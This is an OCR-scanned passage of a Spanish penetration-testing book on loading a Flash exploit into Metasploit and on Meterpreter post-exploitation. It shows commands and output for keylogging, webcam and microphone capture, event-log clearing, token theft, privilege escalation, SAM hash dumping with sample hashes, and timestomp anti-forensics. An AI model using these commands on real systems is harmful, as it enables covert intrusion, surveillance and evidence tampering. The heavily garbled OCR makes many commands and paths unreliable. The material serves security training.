This module exploits a vulnerability in Adobe Flash Player versions 18.3.181,23 


Fig 3.38: Descarga de exploit. 
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Una vez que se dispone del fichero con extensión rb, se debe alojar en una rula que cuelgue de la 
raíz de los exploits, es decir, la ruta /pentest/exploits/framework3/modules/exploits. En esta ruta 
se pueden crear otros directorios o alojar el exploit en alguna ya existente. Para este ejemplo se 
creará una nueva carpeta en la ruta comentada anteriormente cuyo nombre será MiExploit. Tras la 
descarga del exploit se ha denominado flashArtelntrusion.rb al fichero que lo contiene, Este fichero 
deberá ser copiado о movido а la ruta /pentest/exploits/framework3/modulesfexploits/MiExploit, 


recientemente creada. 


[оо Е: Jexpioltsk ср Flashartelotruslon.rb /pentest/exploits/framework3/modules/exploits/HiExp 


loit/ | І 
root@bt:-sozploits# cd /pentest/exploits/framework3/modúles/exploits/MiExploit/ 
rootQht:¿pentest espleits/Tramevork3/modules/exploits/miExploité 15 
fiashártsintrusion.rb Pan. 

гоо: /peniest/oxploits/framework3/modulas/axplaits/NiExpl aitt 3 | 
ана e a A A O 


Fig 3.39: Adición de un exploit a una ruta de Metasploit. 


a) 


Una vez que se dispone de los nuevos exploits en las rutas, y éstos estén preparados se debe arrancar 
el framework para poder interactuar con ellos. Tras lanzar msíconsole se utiliza el comando use para 
cargar el módulo utilizando la ruta dónde se aloja HashArtelntrusion.rb. Como se puede observar 
en la siguiente imagen es bastante sencillo e intuitivo la adición de exploits y su organización en el 


framework, mediante el uso de directorios. 


nsf > use exploit/Miexploit/flashArteIntrusion 
msf exploit(THlashArteIntrusion) > show options 


Module eptions (exploit/MiExploit/flashArteIntrusion): 


Fig 3.40; Acceso al exploit añadido al framework. 


П 
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Capitulo IV 
Meterpreter & Post-Explotation 


3. Ambito 


El presente pto se centra en el ámbito de la post-explotación una de las fases más delicadas del 
test de inirusión. En esta fase el auditor puede obtener gran cantidad de información sobre el estado 
de una red, de una máquina o incluso, poder obtener acceso a zonas donde antes no se podía acceder, 


En muchas ocasiones se quiere llegar a zonas de Іа red desde las que un auditor, en el estado actual 
no puede lograr acceso. Pero sí es cierto que el auditor puede demostrar a la organización que está 
siendo auditada, que tener un mal diseño de red, o no delimitar correctamente los accesos a zonas 
de la red sensibles, pueden provocar accesos no autorizados. En muchas ocasiones estos accesos 
no se realizan directamente desde la máquina que dispone el auditor, y sí a través de máquinas con 
menor peso en la organización, las cuales proporcionan conectividad con zonas más sensibles de 
la red. Incluso, puede que las máquinas comentadas anteriormente compartan credenciales con las 
máquinas más importantes, un grave error de seguridad que sin duda El auditor podrá aprovechar 


para impersonalizar, 


La post-explotación es por tanto una de las fases comprendidas en un test de intrusión y la cual debe 
ser procesada de manera minuciosa. En esta fase el auditor recopilará información real del escenario, 
utilizando como intermediario una máquina vulnerada en la fase anterior, la fase de explotación.. 


En dicha fase se indicaba que la elección del payload es una acción crítica ya que las funcionalidades 
que se podrían realizar después de lograr la explotación dependían de éste, En algunas ocasiones по 
se necesitan muchas funcionalidades y sí una en concreto. Mientras que en otras ocasiones lograr 
tener un control completo sobre la máquina victima puede ayudar, y mucho, en la fase de post- 
explotación. 


Cuando se dispone de acceso físico a una máquina, uno de los payload más interesantes que se 
puede ejecutar es alguno que proporcione una escalada de privilegios en la misma. No es necesario 
montar un Meterpreter, el cual se estudiará más adelante, para simplemente elevar privilegios. 


También hay que recalcar que en muchas otras ocasiones se necesita de payloads como Meterpreter 
para poder disponer de un contro! total sobre la máquina víctima, Pero no sólo un contro! total sobre 
la máquina vulnerada, sino aprovechar esta situación para controlar el entorno de dicho equipo, 
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Para poder ilustrar esta última sentencia se propone un escenario como el siguiente: 


- El auditor dispone de conectividad con una máquina con sistema operativo Microsoft 


Windows XP vulnerable y posee también los exploits necesarios para conseguir acceso. 


- El auditor no dispone de conectividad directa con una máquina con sistema operativo 
Microsoft Windows Server 2008. Entonces, el auditor no puede auditar a priori dicha máquina. 


- El sistema operativo que utiliza el auditor no es relevante, pero se supone que es una 
distribución BackTrack. 


- La máquina con Windows XP si dispone de conectividad con la máquina Windows Server 
2008, 


Si el auditor vulnera la máquina con Windows ХР dispone de al menos conectividad con el equipo 
Windows Server 2008. A partir de ese momento se puede auditar e intentar lograr acceso а dicha 
máquina. Como se verá más adelante se pueden probar distintas técnicas para conseguir dicha 
acción. La impersonalización de usuarios o lécnicas como el pivoting ayudan y mucho al auditor en 
este tipo de escenarios. 


En resumen, la fase de post-explotación es lan extensa como importante en un test de intrusión. El 
auditor debe tener en cuenta cual es el objetivo o los objetivos y entonces realizar una planificación 
para lograr éstos. Conocer el escenario es importante y en esta fase se consigue más información 
sobre el escenario real del que se dispone. 


2. Comandos básicos de Meterpreter 


Melerpreter es un payload disponible para Metasploit con el que se puede realizar casi toda acción 
imaginable. Meterpreter aporta una consola o línea de comandos propia con sus comandos incluidos. 
Además, puede ejecutar sus propios scripts lo cual hace que aumente la potencia y posibilidades que 
ofrece Meterpreter. También se pueden cargar módulos que aportan funcionalidades extra con los 
que los usuarios pueden realizar más acciones. 


se pueden desarrollar scripts y añadirlos al framework de manera sencilla. Este hecho dota a 
Meterpreter de flexibilidad y la posibilidad de aumentar las funcionalidades que el payload aporta a 
los usuarios. Es realmente difícil enumerar todas las acciones que se pueden realizar con Meterpreter, 
сі alcance de la imaginación del usuario es realmente importante, 


La técnica que se utiliza para ejecutar un Meterpreter en una máquina vulnerada es la inyección en 
memoria de DLLs en los procesos en ejecución del equipo vulnerado. Después de explotar el equipo 
vulnerable se cargan dichas DLLs en el proceso vulnerado y se obtiene una interfaz intuitiva de línea 
de comandos, Generalmente, Meterpreter migra de un proceso a otro para evitar que el cierre o la 
caída del proceso vulnerable haga caer la conexión con la máquina atacante, 
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Los comandos propios de Meterpreter se estructuran en tres categorías principales que son las 
siguientes: 


- Core commands. 
-  Stdapi | 


= Р; Ч y 


Core commands | o o 
Los comandos de tipo núcleo permiten realizar distintas funciones básicas en la sesión en la máquina 
remota. El objetivo de estos comandos es el de ejecutar scripts, cargar módulos e interactuar con la 
máquina remota. | 


En la imagen se puede visualizar el listado completo de los comandos de tipo núcleo. Más adelante 


ṣe estudiarán las distintas acciones que se pueden realizar con ellos agrupándose por tipos de 


funcionalidades que presentan. 


ore Commands 


батыла ое 


Command Description 


? Help menu | 

background Backgrounds the current session 

bgkill Kills a background meterpreter script 

bglist Lists running background scripts 

bgrun Executes a meterpreter script as a background thread 
channel Displays information about active channels 
close Closes a channel ; 

ехії Terminate the meterpreter session 

help Help menu 

info Displays information about a Post module 
interact Interacts with a channel 

irb Drop into irb scripting mode | 

load Load one or more meterpreter extensions 
migrate Migrate the server to another process 

quit Terminate the meterpreter session 

read Reads data from a channel 

resource Run the commands stored in a file 

run Executes a meterpreter script or Post module 
use . Deprecated alias for 'load' 


Writes data to a channel 


Fig 4.01: Listado de core commands de Meterpreter: 


write 


Comandos para la ejecución en segundo plano 

Existen varios comandos que permiten al usuario ejecutar scripts de Meterpreter en segundo plano. 
El comando bgkill permite al usuario eliminar un script de Meterpreter que se esté ejecutando. Б 
comando bglist permite listar los scripts de Meterpreter que se están ejecutando actualmente, у por 
último el comando Бекип permite ejecutar un script de Meterpreter en segundo plano. 


Metasploit para Pentesters 
Hay que tener en cuenta la existencia del comando background, el cual permite dejar la sesión de 
Meterpreter en segundo plano y volver a la interacción con la interfaz de Metasploit que se esté 
utilizando, por ejemplo, msfeonsole о msjeli. 


en la imagen se puede visualizar como se ejecuta un script denominado keylogrecorder el cnal 
permite realizar capturas de las pulsaciones de teclado de la máquina vulnerada, Se puede visnalizar 
como se utilizan los distintos comandos para listar los trabajos en segundo plano y finalizarlos. 


lusterpreter > bgrun keylogrecorder | 


¡=] Executed Meterpreter with Job ID 2 | 

meterpreter > [+] explorer.exe Process fcund, migrating into 1729 

+] Migration Successful?! | 
і 


ltt Starting the keystroke sniffer... 

[+] Keystrokes being saved in to /root/.msf3/Logs/scripts/keylogrecorder/192.168.8.57 20120828,1 

S50.txt Н 

t7} Recording | 
| 


meterpreter > bglist 

[+1 Job 2: ["keylogrecorder*] 
meterpreter > bglist 

[7] Job 2: ["keylogrecorder"] 
meterpreter > bgkill 2 

[+] Killing background job 2... 


Fig 4.02: Ejecución de los background commands, 


Ejecuciones y cargas 
Para realizar ejecuciones de scripts o cargar módulos que proporcionen nuevas funcionalidades 


а Melerpreter о incluso ejecutar los ficheros de extensión RC para automatizar tareas se pueden 
utilizar distintos comandos. 


El comando nee se encuentra en desuso y es equivalente al comando load con el que se pueden cargar 
módulos para Meterpreter. El comando resource permite ejecutar archivos de automatización, los 
conocidas por la extensión RC. Uno de los comandos más importantes es гип уа que permite ejecutar 
los scripis de Meterpreter. Estos scripts son una de las partes más im portantes de la herramienta por 
toda la funcionalidad que aportan y el constante desarrollo de éstos por la comunidad. 


Comandos de ayuda 
Los comandos de ayuda e información de los que dispone Meterpreter son los si guientes: 
- help. El cual muestra información de uso del comando del que se requiere información. 


En ocasiones no se encuentra disponible ayuda del comando а travás de help, es por ello que 
hay que ejecutar el comando del que se requiere información con el parámetro —һ activo. 


- Е comando ? proporciona una ayuda similar a la del comando help. 


Interacción y uso de canales 


El comando execute no es un comando de tipo núcleo o core command, pero se utiliza para ejecutar 
una aplicación en la máquina vulnerada, es decir, en е] equipo remoto. Como se puede visualizar en 
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la imagen, con este comando se pueden ejecutar aplicaciones en la máquina remota, Este comande 
se explicará más adelante, 


Una vez que Meterpreter ha ejécutado un proceso en la máquina remota se puede interactuar con 


- éste a través de la línea de comandos. Por ejemplo, con cl comando execute se ha lanzado una cmd 


en la máquina remota y como se ha ejecutado execute con el parámetro —с se ha creado un canal pon 
el que se podrá interactuar con dicho proceso. | 


El comando channel permite conocer los canales que se encuentran activos, e incluso con los 
parámetros =r y --w es posible leer la salida dei proceso correspondiente y escribir en dicho proceso, 
El comando read es equivalente a utilizar la instrucción channel -z mientras que el comando writel 
es compatible con la instrucción channel —w. | 


-F cmd.exe -H -c 


meterpreter > execute 
Process 1096 created, 
Channel 1 created, 

meterpreter > channel -1 


Id Class Type ` 


1 3 stdapi_process 


meterpreter > read 1 
Read 104 bytes from 1; 


Microsoft Windows XP [Versifn 5.1,2699) 
lic) Copyright 1985-2681 Microsoft Corp. 


C: \WINDOWS\ system32> 


meterpreter > write 1 | ; 
Enter data followed Бу a *.' оп an empty line: 


cd A 


ж] Wrote 5 bytes to channel 1. 
meterbreter > read 1 
Read 11 bytes from 1; 


cd \ 
Ci 
lueterpreter > Y І 


Fig 4.03: Interacción con el canal creado en un proceso, 


El comando interact permite interactuar con el proceso ejecutado en la máquina remota, simplemente 

indicando el identificador del canal que hay abierto con el proceso remoto, En el caso del proceso. 
ста. exe abierto anteriormente se debe ejecutar la instrucción interact <id canal> para poder escribir 

en la línea de comandos remota. 


Stdapi 

Este tipo de comandos permiten al usuario realizar acciones comunes, que cualquier usuario puede 
ejecutar en el sistema operativo que utilizan, sobre el sistema operativo de la máquina remota, 
Existen distintas categorías de comandos de tipo stdapi que son las siguientes: 
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- File System Commands. Los comandos del sistema de archivos permiten al atacante о 
auditor realizar operaciones sobre los archivos tanto remotos como locales. 


- Networking Commands. Los comandos de red permiten al usuario realizar consultas y 
gestionar los dispositivos de red de la máquina remota. 


- System Commands. Los comandos de sistema permiten gestionar recursos del sistema. 


- User Interface Commands. Los comandos de interfaz de usuario permiten realizar 
acciones sobre el escritorio, captura de pulsaciones de teclado, captura de pantalla o el петро 
de inactividad del sistema. 


- Webcam Commands. Estos comandos permiten grabar del microfono del equipo remato 
51 lo hubiera, listar las webcams disponibles en la máquina remota o, incluso, realizar 
fotografias de la víctima con la webcam. 


File System Commands 
El listado de comandos para realizar operaciones sobre el sistema de archivo, tanto local como 
remoto se puede visualizar en la siguiente imagen. 


Stdapi: File system Commands 
AÑ SES 


pal 


Command Description 

cat Read the contents of a file to the screen 
cd change directory 

del Delete the specified file | 
download Download a file or directory 

edit Edit a file 

демі Print local working directory 

getwd Print working directory ! 
led Change local working directory 

1рма Print local working directory | 
15 List files 

mkdir Make directory 

pwd Print working directory 

га Delete the specified file 

rmdir Remove directory 

search Search for files 

upload Upload a file or directory 


Fig 4.04: Listado de file system commands de Meterpreter 


Como curiosidad indicar que los comandos clásicos de GNU/Linux están disponibles para el sistema 
remoto. Es decir, la ejecución de Zs, que es un comando no válido en Windows, provoca la obtención 
del listado de archivos de la máquina Windows vulnerada. 


Hay que destacar los comandos upload y download con los que se puede subir un archivo a la 
máquina vulnerada y descargar un archivo de la máquina víctima. Como se puede visualizar en la 
imagen siguiente la sintaxis de estos comandos es realmente sencilla. 


También es interesante ver los comandos rm, mkdir rmdir. edit que son fácilmente entendibles. El 
comando search permite realizar búsquedas de ficheros en el equipo remoto. Search dispone de 
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parámetros para afinar las búsquedas, por ejemplo con el parámetro —Їзе pueden buscar patrones de 
ficheros, con el parámetro —d se pueden realizar búsquedas de directorios, unidades, etcélera. 


[neterpreter > upload /root/hack.txt CN | 
[*] uploading : /root/hack,txt -> с:\ 

{=} uploaded : /root/hack.txt -> с:\\һасК.їхї 
metecereter > cat c:Mihack, txt 

prueba | 
seterpreter > download с:\\с1аумез.їхї /root 

[+] downloading: c:Wclaves, txt -> /гоої 


1+] downloaded : c:\claves. txt -> /root/claves. txt] 


Fig 4.05: Subida y descarga de archivos a la máquina vulnerada. 


Networking Commands 
El listado de comandos para realizar las gestiones de red se puede visualizar а continuación, 


A EAEE рыннан Мыйын ЫШЫ ОСЫНЫ 
рәр Hetworking Commands 


AA 


Command Description 

| ipconfig Display interfaces | 

i portfwd Forward a local port te a remote service 
route view and modify the routing table 


о и tnae a ara 


iig 4.06: Listado de comandos para gestión de red con Meterpreter 


El comando route permite visualizar y manipular las entradas de la tabla de rutas dei equipo remoto, 
Por otro lado, el comando ipconfig permite visualizar la configuración de red de la máquina remota. 
El comando porífiwd permite realizar port forwarding sobre la máquina vulnerada. 


System Commands 
Los comandos de sistema son realmente útiles e interesantes. Son de los comandos de Meterpreter 


más utilizados por los usuarios ya que proporcionan gestión del sistema vulnerado. Á continuación 
se puede visualizar un listado de los comandos de sistema de Meterpreter. 


ШП System Commands 


AA АЦЕ 
| Command Description 
clearev Clear the event log | 
drop_token  Relinquishes any active impersonation token. 
execute Execute a command 
getpid Get the current process identifier 
деїргімѕ Attempt to enable all privileges available to the current process 
getuid Get the user that the server is running as 
| kit Terminate a process 
| ps List ruming processes 
reboot Reboots the remote computer 
reg Modify and interact with the remote registry 
rev2self Calls RevertToSelf() on the remete machine 
shell Drop into a system command shell 
shutdown Shuts down the remote computer 


steal token lattempts to steal an impersonation token from the target process 
|_ sysinfo Gets information about the remote system, such as 05 


Fig 4.07: Listado de comandos de sistema de Meterpreler. 
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Нау que destacar ciertos comandos де! listado como es clearev, con el que se puede eliminar 
información de los registros. Con este comando el atacante puede borrar las huellas de las operaciones 
que ha realizado cn el sistema vulnerado. Se elimina información correspondiente a los registros de 
aplicación, de seguridad y del sistema. 


Los comandos finalizados en la palabra token aportan la posibilidad de suplantar la identidad de 
olro usuario o servicio. El comando steal_token permite cambiar la identidad a través del PID de los 
procesos, La sintaxis es sencilla steal_token <PID>, y de esta manera se aguiere la identidad del 
proceso que se quiera. Para volver a la identidad anterior se dispone del enmando drop_token, que, al 
ejecutarlo se vuelve a la identidad previa. Para conocer la identidad que se dispone en un momento 
dado se puede utitizar el comando geluid. Otros comandos relacionados son getpid con el que se 
obtiene el PID del proceso en el que se está ejecutando la sesión de Meterpreier en ese instante, y 
reve2self con el que se puede volver a la identidad anterior, por lo su funcionalidad es similar a lu del 
comando drop token, 

Los comandos kill y ps permiten eliminar procesos que se están ejecutando en in máquina remota y 
listar los procesos con gran cantidad de detalle, entre toda esta información ofrecida destaca el PID 
de los precesos. Otros comandos a tener en cuenta son reboot y shutdown, que permiten reiniciar y 
apagar la ináquina remota respectivamente. 

il comando reg Proporciona una estructura para poder interactuar con el registro de la máquina 
remota. La sintaxis es reg <comandos> “parámetros>. A continuación se especifican los tipos de 
comandos que recibe reg: | 


Enumkey. Este comando enumera о fista el contenido de una clave concreta. Como 
ejemplo se presenta la si guiente instrucción: reg enumkey -k HXLiMSoftware. 


-  Createkey. Crea una clave en la entrada que se especifique, Como ejemplo se presenía: 
reg createkey ~k HKCUWhacked 

-  Deletekey. Elimina la clave correspondiente con la ruta que se indique en el parámetro —k. 
Como ejemplo se presenta la si guiente instrucción: reg deletekev -k HKCNhacted 

- — Queryclass. Consulta el tipo de la clave. 


- ера! Asigna un valor a una clave del registro. Un ejemplo sería: reg seivalue -k EKCON 
hacked ~v nombre -d valorDeDatos . | 


-~ Queryval. Consulta el valor de un campo de una clave de! registro. Un ejemplo sería: reg 
queryval =k HKCDWhacked -v nombre, 


El comando shell es uno de los más interesantes ya que proporciona una línea de comandos sobre 


la máquina remota. De este modo se puede administrar el equipo remoto como si se estuviera 
fisicamente en el mismo. 


Por último, el comando sysinío ofrece información sobre el sistema vulnerado. Dicha información 
consiste en el nombre del equipo, el sistema operativo.(el Service Pack en caso de que sea un 
Windows), la arquitectura del equipo y la configuración regional de la máquina. 


Capitulo IV. Meterpreser € Post-Explotation 


User Interface Commands | | ЗР 
Los comandos de interacción con la interfaz de usuario proporcionan al atacante la posibilidad ас 


4.4 


. + . Я e 7 7. КЕ { t te 
gestionar propiedades del escritorio, el teclado у el propio sistema así como la actividad de és 


Estos comandos риейеп ser visualizados en la siguiente imagen. | 
Stdapi: User interface Commands | 
[AENA 


Cusmand Description | 


tdestto Get the current meterpreter desktap , 
Кене р Returns the number о? seconds the remote user has been idle 
keystes_dump Dump the keystroke buffer 
aeyscon_start Start аа су аз 
keyscan_stop Stop captur ng keystrokes 
ери ' Grah a screenshot of the interactive desktop 
setdesktop Change the meterpreters current desktop 

| uicti Control some of the user interface components 


; ts 9 пече in 5 nri > elerpreter 
Pig 4.08: Listado de comandos para gestionar la interfaz de usuario de Meterprete 


} 

| enundesktops iist aii accessible desktops and window stations 
і 

] 

{ 

] 


Cabe destacar el comando idletime con el que se puede consultar el tiempo de inactividad del sistema 
per parte de la víctima, es decir, el tiempo que la victima lleva sin utilizar su sistema. 


Los comandos que empiezan por keyscah proporcionan contro! sobre el teclado de la víctima, a 
е АК ыз ч : , 1 a P ! era 

el comando keysean_starít se empiezan a capturar las pulsaciones de teclado del equ ipo vulnerado, 
mieniras que con keyscan_stop se dejan de capturar dichas pulsaciones. El comando о 
obliga a Meterpreter a realizar wn volcado del buffer donde están contenidas ias pulsaciones en la 
máquina victima, 


Con el comando sercenshol se obtiene una captura de pantalla de Ta máquina de la víctima.. E 
archivo resultante es descargado automáticamente por Meterpreter y álojado en la carpeta dónde sf 
esté ejecutando Merasploit, por ejempio /root/<nombre aleatorio> jpe. 


Webcam Commands | тыы 
Los comandos sfdapi de tipo webcam son muy vistosos ya que realizan 20солех sobre п 2. с 
y la webcam de un equipo vulnerado. El listado de comandos se puede visualizar a continuación, 


[Sedapi: Wescam Commands 


ANITA 
ЕСИ ЧЕГ раро 


f 


Command Description 


| record mic Record audio from the defawlt microphone for X seconds 
jo мерсат list List webcams l 
n webcam snap Таке a snapshot from the specified webcam 


ns 


Fig 4.09: Listado de comandos relacionados con el micrófono y la webcam. 


El comando record_misc dispone de varios parámetros interesantes. El parámetro —d indica el 
número de segundos que se grabarán en la máquina remota, hay que tener en cuenta que por pepa 
es | segundo, El parámetro —f indica en qué ruta de la máquina del atacante, es decir la ruta local, se 
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almacenará la grabación. El parámetro —p indica si automáticamente se ejecutará el archivo de audio 
tras la grabación, por defecto viene activado. 


El comando webcam_list permite obtener un listado de las webcam disponibles en la шайипа 
vulnerada. En caso de disponer de una webcam en la máquina remota, se puede utilizar el comando 
webcam_snap con el objetivo de realizar fotografías de la víctima. Este comando dispone de distintos 
parámetros que aportan funcionalidad al comando. 


Priv 

Los comandos del módulo priv proporcionan funcionalidades para elevar privilegios, manipular 
información sensible que puede ser utilizada por un analista forense y realizar otras tareas de interés 
como es la manipulación del fichero SAM, Security Account Manager. 


riv: Eleyate Commands a - | 
o ! | 
| Comand © 7 Description | 
getsystem _ Attempt to elevate your privilege to that of local а 
гіу: Password database Commands: | | 


- Command E Description 


hashdump _ Dumps the contents of the SAM database 
riv: Timestomp Commands л E i : 


‚ Command Description 


Tan оп э аак а 


timestomp Manipulate file MACE attributes 


Fig 4.10: Listado de comandos del módulo priv 


El módulo se divide en tres categorías, que permiten realizar diversas acciones. Dichas categorías 
son: 


- Elevate Commands. Realiza elevaciones de privilegios en el sistema vulnerado. 
- Password Database Commands. Obtiene información sobre usuarios y contraseñas. 


-  Timestomp Commands. Realiza la manipulación de los atributos de los archivos. 


Elevate Commands 
El comando gelsystem permite realizar intentos para elevar privilegios en el sistema vulnerado. Con 
sistemas Windows ХР se conseguirá realizar esta operativa de manera senci lla, pero si el usuario 


se encuentra con Windows 7 la elevación de privilegios supone un reto mayor, el cual se verá más 
adelante, 
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г > getuid та 
erver username: PRUEBAS-917606CC Administrador 


neterpreter > getsystem 
. - «Got system (via technique 1). 


ter > getuid 
erver username: NT AUTHORITYA SYSTEM | 
teterpreter > | 


Fig 4.11: Elevación de privilegios еп un sistema Windows XP vulnerado. 


Password Database Commands | 

El comando haxhdump ofrece la posibilidad de obtener los hashes y usuarios que se E ап | 
el sistema. Como se verá más adelante esta información es importante cuando se requiere utilizar la 
impersonalización de usuarios. 


a 


heterpreter > hashdunp | ЖИЛЕ БИРИ 
dministrador:590:8735172c3a77d2c6aad3b435b51484ee:512b99609997c3b5588cafac9c0a0969::: 


sistente de ayuda: 1089: 317dd0337ea2d549dc6743cd7ee77792:e1ec1bc5811420f30095794428799054 os 
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d163e931b73c59ú 7ейсавдсё; Нн 

ере: 1003:8735172c3a77d2c6a8d3b435b51404ee :512b29909997c3b558Bcafac9c0ae969::: SA 
SUPPORT 38894530: 1092: a8d3b435b51404eeaad3b435b51404ee:3ch0da961c4388978ebcc94400725954::: 
eternreter > 


Fig 4.12: Voicado de usuarios y hashes de la SAM. 


Timestomp Commands | СИ 
El comando fimestomp permite manipular los atributos de un fichero del sistema vulnera о. ¿Con 
qué fin? Principalmente, se busca realizar un antiforensics con el que las pistas dejadas en el equipo 
queden confusas e incongruentes. 


El comando implementa gran variedad de opciones que se listan a continuación: 


- Modificación del último acceso. Para llevar a cabo esta acción se debe ejecutar la siguiente 
instrucción timestomp <ruta fichero remoto> -a "12/22/1986 12:12:34”. El formato E lecha 
va entre comillas y tiene dos campos, el primero es la fecha con el formato MM/DD/Y YYY, 
y el segundo es la hora con formato HH:MM:SS. 


- Fecha de creación del archivo. Se puede modificar la fecha de creación del archivo а través 
de la siguiente instrucción fimestomp <ruta fichero remoto> -c “12/22/1986 13:05:57”. 


- Fecha de modificación. Se puede modificar esta fecha con la siguiente instrucción 
timestomp <ruta fichero remoto> -m “12/22/1986 23:23:12”. 


- — Forzar modificación de todos los campos anteriores. Para asignar la misma fecha a los 
campos de último acceso, modificación y creación se dispone de la siguiente instrucción 
imestomp <ruta fichero remoto> -z “12/22/1986 22:34:54”. 


- Visualización de los atributos. Para visualizar los atributos de un fichero del equipo 
remoto se ejecuta la siguiente instrucción timestomp <ruta fichero> -v. 


- Рага ejecutar una operación sobre los atributos de un directorio de manera recursiva se 
dispone de la siguiente instrucción timestomp <ruta fichero> -г. 


ШеТегргеТег > tinestonmp C:ANMOCK. ТАРТ 

Modified : 2012-68-28 18:44:58 +9200 ү 
ccessed : 2012-08-29 14:39:24 +6260 
reated : 1986-12-22 12:12:34 +0100 
тігу Modified: 2812-08-29 14:28:31 +0268 
eterpreter > timestomp с:\\һасК.тхї -e "12/22/1986 12:12:34" 
*] Setting specific МАСЕ attributes on c:Mhack. txt 

[шиша > Limestomp є:\\һәсК.їхї -v 

odifizd : 2012-08-28 18:44:58 +8200 

iccessed : 2012-08-29 14:36:24 +0200 

ereated : 1986-12-22 12:12:34 +9100 | 
Entry Modified: 1986-12-22 12:12; 34 +0106 

Weterpreter > timestomp с:\\ћаск. х -m "12/22/1986 12:12:34" 
[+] Setting specific МАСЕ attributes on с:\ћаск.їх+ 
heterpreter > timestomp с:\\һаск, txt -v 

Hodified : 1986-12-22 12:12:34 +01606 

[сезе ; 2012-08-29 14:34:32 +0200 

к. Гсаѓей : 1986-12-22 12:32:34 +0106 

Entry Modified: 1986-32-22 12:12:34 40180 

Е > timestomp с:\\Васк. txt ма М 


Usage: timestomp file path orons | 
odo АЙМ aA 


Fig 4.13: Manipulación de atributos de un fichero en el equipo remoto. 


3. Scripts de Meterpreter 


Existen gran cantidad de scripts que se pueden ejecutar por Me terpreter en la máguina vulnerada 


a través del comando run, Para conocer que scripts hay disponibles en una sesión de Meterpreier 


se debe escribir el comando run y mediante el uso del tabulador para autocompletar se mostrará un 
mensaje con n todas las posibilidades que se disponen. | | 


A 
heterpreter > гип run event_managor | 
Display all 189 possibilities? {у or n) run file coliector 


eun агр ѕсаппег run get. application list | 
run autoroute run get env 

run checkvm гоп get filezilla _Ccreds И 
run credcollect run get_ local _subnets 

run domain list gen run get Pidgin „сгебь 

гиа dumplinks гип get_valid comunity 
run duplicate run getcountermmeasure 

Fun enum_chrome гип getgui 

run enum firefox run gettelnet { 
гип enum logged on users гип getvncgw 

[гоп enum. „powerahell | env гип hashdump | 
run enum putty run hostsedit 

jun enum shares run keylegrecarder Е 


Їр 
¡pun enum m viware 


run killay 


д) 


Fig 4,14: Visualizar listado de scr: ipts disponibles en una sesión de Meter preter. 


Algunos scripts realizan funcionalidades similares a las de algunos comandos comentados 
anteriormente. En este apartado se estudiarán los que se consideran más interesantes para el auditor 


y la fase de post-explotación. 
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framework es la versión 4 la ruta sería /root/msf4/logs/scripts, 


— E 


LOS scripts son desarrollados por la comunidad, lo que hace que existan gran cantidad de elios 


- Algunos se pueden obtener mediante subversion y otros es obligatorio hacerlo de manera manual 


En la ruta ¿pentest/exploits/framework3/scriptshmeterpreter se dispone de gran cantidad de scriptá 
de este payload tan especial. Los scripts que vienen con Metasploit depende de la versión que ses 
obtenga dej producto y las actualizaciones que vayan surgiendo de éste. | 


winenwum: el informador 


Este script es el más completo para la recopilación de información de la máquina vulnerada 


Los resultados se almacenan en la máquina del atacante en la ruta /ro0f/ msf3/logs/scripts, о si ей 


winenum realiza numerosas acciones, entre las que destacan lanzar gran cantidad de órdenes de пе; 


- de comandos y de órdenes de WM!, obtener un listado de aplicaciones que se encuentren instaladas 


en la máquina vuinerada, realizar un volcado de los hashes de ia máquina, obtener un listado del 
tokens, etcétera. 


аана perras 


Imeterpreter > run winenun ш 


i+} Running windows Local Enumerion Meterpreter Script 
(7) New session оп 192.16D.0.59:445. 
[+] Saving general report to /root/. .msf4/Logs/scripts/winenun/PRUEBAS- 01760СС 29120629 .5430/рПШЕ 
ВА5-01760СС 20170829. 5438, txt 
[+] Output of each individual command is saved to /root/.mst4/logs/scripts/winenum/PRUEBAS -01760 
СС 20120829, 5430 
[є] Checking if PRUEBAS-B1760CC is a Virtual Nachine ....... 

е] UAC is Disabled 

[+] Kunning Command List... 
} running command net view 

ruming command netstat -nas 

running command netstat -vb 

rumning command netstat -ns 

ruening command net accounts 

runping command route print 

running command ipconfig /displaydns 

running command агр -a 

running comuand ipconfig /all 

running command cmd.exe fc set 

running command net localgroup administrators 

Funting command net group administrators 

running command net view /domain 

running command netsh firewall show config 

running command tesklist /svc 

running command net localgroup 

running command net user 

running command net group 


running command net share 
ruming command net session 
running command gpresult /SCOPE USER /Z 


Fig 4 15: Ejecución del script winenum. 


La ejecución de winenum proporciona gran cantidad de archivos como se puede visualizar en 
la imagen. Esta información se almacena en la ruta /ооѓ/ msf3/logs/scripts/winemum/<nombre ' 
máquina>, Esta cantidad de información puede ayudar al auditor a comprender el estado de la 
máquina y de su entorno real. А continuación se puede visualizar una tabla distribuida por contenido 

y los archivos que se pueden encontrar. 
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Archivos Temática 
arp__a.íxt 
ipconfig _ all txt 


ipconfig__displaydns.txt 


Ж Эр, 
| netsh_firewall_show_config.txt 
ОМ > -7 | y С A ¡ 
| пеіуа! пао. їі ¡ Información, configuración 
пе _ ns. ¿xi : 
ietstat _ ns txi y estado de la red | 


netstut_ vb.1xt 

net view __domain. ixi 
nei_view.txi 
roule print txi 
| gpresull_ SCOPE COMPUTER _ Z.ixt ЗЕТЕ | 
gpresult SCOPE USER Z.txi каш | 


hashdump.ixt С | 
пе! ассоитх.1хі 


nel_group. txi | 
neí_group_administrators. txt 

nel_localgroup. txt Información usuario y hashes 
net_localeroup_administrators. txt ; 
net_session. txi 

пег иѕекіхі 
¡ LJokens. [xt 


П 
| net_share. txt 


Recursos compartidos 


program _list.csv Aplicaciones 


Tabla 4.01: Archivos y temática de los resultados de Winenum., 


^ 


root@bt:~/.msf4/logs/stripts/winenum/PRUEBAS-02760CC_20120829.5430# 15 
arp акі И net_share.txt ` | 

ехе с set.txt пе і і 
gpresutt SCOPE COMPUTER Z.txt о (is 
presult__SCOPE USER Z.txt netstat_ns.txt 
hashdump.txt netstat yb.txt 
ipconfig аі. їхї пеї иѕег. txt 
ipconfig displaydns, txt net view _domain.txt 
net_accounts. txt net_view, txt 
лег g roup_administrators.txt programs 1151. сѕу 
net_group.txt PRUEBAS -8 
net_localgroup_administrators.txt route Е Ее 
net_localgroup. txt tasklist  syc.txt 
O tokens. txt 
root@bt:~/.msf4/logs/scripts/winenum/PRUEBAS-01760CC 20120829.5430% ca 
ra Ж, 733172С3а7742СбзайЗЬ435Ь514ддев:5Т2Ь998В98 2 сЗЬ$ЕВ саас с8а: 3 
еллы sayu а:1800:317040337еа205490с6743сЧ7еге77792:е1ес1һс581142013а09578442879965@::: 

